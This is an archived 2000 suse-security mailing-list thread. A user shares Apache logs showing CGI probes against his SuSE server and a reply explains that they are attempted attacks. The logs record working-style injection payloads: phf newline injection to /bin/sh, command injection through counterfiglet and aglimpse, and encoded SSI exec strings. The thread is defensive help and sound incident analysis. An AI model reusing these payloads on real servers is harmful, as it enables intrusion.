Sombody tried to use web server cgi scripts to hack your server. the line POST /cgi-bin/phf?Qname=x%oa means : call the script phf in cgi-bin %0a = carrige return /bin/sh tried to call an external program !! DELETE ALL YOUR TEST-CGIs and PHPs delivered with the WEB Server in Standard configuration !! Best way to secure (but maybe not possible) : Do not allow POST on CGI bye Harald Scharf softpoint electronic h.scharf@softpoint.at -----Ursprüngliche Nachricht----- Von: Marc Baaden [mailto:marc@causul.u-strasbg.fr] Gesendet: Mittwoch, 5. April 2000 09:34 An: suse-security@suse.com Betreff: [suse-security] Web server security holes ? Dear All, I am quite concerned about security, and I think my machine is doing well with respect to all usual services as telnet, FTP, etc... Unfortunately I am not very experienced with web servers, and have the standard features of SuSE 6.3 installed (Apache, I think). On two of my machines I got the following log entries in http.acces_log/ error_log - What does it mean ? - Is it dangerous for the machine ? - Can I further secure my machine ? PS: I do NOT need the machine beeing accessible by external machines in HTTP Thank you for explaining these things to me ... 131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281 131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280 128.175.13.74 - - [19/Mar/2000:17:43:12 +0100] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%2 0-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 376 128.175.13.74 - - [20/Mar/2000:03:46:42 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 200 482 128.175.13.74 - - [20/Mar/2000:06:07:22 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280 128.175.13.74 - - [20/Mar/2000:07:02:50 +0100] "GET /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eva l$CMD; HTTP/1.0" 404 346 128.175.13.74 - - [21/Mar/2000:00:50:01 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281 128.175.13.74 - - [21/Mar/2000:06:33:15 +0100] "POST /cgi-bin/sh HTTP/1.0" 404 279 128.175.13.74 - - [21/Mar/2000:07:17:24 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73% 72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 282 128.175.13.74 - - [21/Mar/2000:08:32:59 +0100] "GET /%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2 F%69%64%22%2D%2D%3E/index.html HTTP/1.0" 404 316 [Sun Mar 19 17:43:12 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/counterfiglet [Mon Mar 20 06:07:22 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/phf [Mon Mar 20 07:02:50 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/aglimpse [Tue Mar 21 00:50:01 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/perl [Tue Mar 21 06:33:15 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/sh [Tue Mar 21 07:17:24 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/query [Thu Mar 30 22:34:16 2000] [notice] Apache/1.3.9 (Unix) (SuSE/Linux) mod_perl/1.21 PHP/3.0.12 configured -- resuming normal operations [Thu Mar 30 22:34:16 2000] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [ Marc Baaden -- Marc Baaden - Labo MSM (UMR 7551) - http://crypt.u-strasbg.fr/marc mailto:baaden@chimie.u-strasbg.fr - FAX (+49) 89 24 43 1 68 68 ICQ# 11466242 - Tel: (+33) 3 88 41 60 86 or (+33) 6 09 84 32 17 --------------------------------------------------------------------- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com